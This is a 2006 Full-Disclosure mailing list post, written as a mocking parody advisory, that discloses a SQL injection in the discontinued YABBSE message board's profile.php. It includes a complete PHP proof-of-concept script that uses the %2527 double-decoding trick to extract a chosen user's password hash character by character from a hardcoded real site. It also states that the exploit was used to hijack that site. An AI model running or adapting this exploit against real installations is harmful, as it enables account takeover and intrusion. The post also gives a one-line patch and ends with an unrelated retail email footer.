Hey str0ke - Are you the same str0ke whose code I've been ripping, damn I guess I better release my first N3td3v Sponsering Disclosure.....

NDSD-06-001: YABBSE SQL Injection
June 23, 2006

-- Sponsered post

http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046903.html

-- Affected Vendor:
The YABB SE Team

-- Affected Products:
YABBSE (This product is discontinued, but unfortunately still seems to be in mainstream use)

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary SQL on vulnerable installations of the YABBSE message board. 

The specific flaw exists within the "profile.php" php script which is used to give access to user profiles.

-- Vendor Response:The vendor for this product essentially no longer exists. It is recommended that you move to a supported message board.

-- Disclosure Timeline:
2005.06.26 - Vulnerabiliity Discovered
2005.06.27 - Vendor found to have discontinued support
2006.06.23 - Public release of advisory

-- Vulnerability

The vulnerability exists where the user supplied variable $user is processed by the urldecode() function twice, this allows for the %2527 (decodes to %27 decodes to ') SQL injection technique.

- Exploit

The following PoC exploit can be used to retrieve any users (IE admin) password hash which in turn can be used to immitate and login as that user:

**BEGIN PoC Code

<?php
/* 
 yabbse exploit

 all versions - product discontinued

 most of the code ripped from http://www.milw0rm.com/exploits/1036 <http://www.milw0rm.com/exploits/1036>  so credit to str0ke and milkw0rm
*/

$server = "www.uberhacker.com <http://www.uberhacker.com> ";
$user="Dozix007"
$port = 80;

$hash = "";

$hex = "0123456789abcdef";
for($i = 1; $i <= 32; $i++ ) {
        $idx = 0;
        $found = false;

        while( !($found) ) {
                $letter = substr($hex, $idx, 1);

                /* %2527 translates to %27, which gets past magic quotes. This is translated to ' by urldecode. */
                $url="/cgi-pbin/board/index.php?board=;action=viewprofile;user=$user%2527+AND+mid(passwd,$i,1)=%2527" . $letter;
                $header = getHeader($server, $port, $url, "");
                if(!preg_match("/An Error Has Occurred/",$header) ) {
                        echo $i . ": " . $letter . "\n";
                        $found = true;
                        $hash .= $letter;
                } else {
                        $idx++;
                }
        }
}

echo "\n\nFinal Hash: $hash\n";

function getHeader($server, $port, $file, $cookie) {
        $ip = gethostbyname($server);
        $fp = fsockopen($ip, $port);

        if (!$fp) {
                return "Unknown";
        } else {
                $com = "GET $file HTTP/1.1\r\n";
                $com .= "Host: $server:$port\r\n";
                $com .= "Connection: close\r\n";
                $com .= "\r\n";

                fputs($fp, $com);
   
   $header="";

                do {
                        $header.= fread($fp, 512);
                } while( !preg_match('/\r\n\r\n$/',$header) );
        }

        return $header;
}
?>
// jazzy2fives 2005-07-26 - mostly stolen from milw0rm.com [2005-06-08] 

** End PoC Code

-- Patch

It is recomended that if you insist on continuing the use of this product, you remove the line which reads "$user = urldecode($user);" from all functions in "\sources\proflie.php"

-- Credit:

This vulnerability was discovered by me! 

-- About N3td3v Sponsoring Disclosures:

Established by me, n3td3v sponsering disclosures (NDSD) is a system established to reward n3td3v for his (her?) posts to full disclosure which bring me more amusement than any 0-day possibly could. 

The NDSD is unique in how vulnerability information sponsers the incompetency of n3td3v, for each amusing n3td3v post NDSD will attempt to release a disclosure of a previously unknown lame exploit. This is because most valid complaints aginst n3td3v claim that (s/)he contributes nothing to the secutiy comunity. The aim of NDSD is to sponser n3td3v posts thus ensuring that each directly corresponds to a positve contribution to FULL-DISCLOSURE.

-- Misc

For anyone interested, this was the exploit used to hijack www.uberhacker.com <http://www.uberhacker.com>  - a legal hacker trainng site, which had as their primary challenge to hijack the website. The site has since had the majority of it's content removed.

NDSD are a subsidiary of empty vessels (www.emptyvessels.org.uk <http://www.emptyvessels.org.uk> ), one day we might get our website up.



***********************************************************************************

For more information about Aquaterra Leisure, see www.aquaterra.org

To shop for speedo or polar at bargain prices, see www.aquashop.org

***********************************************************************************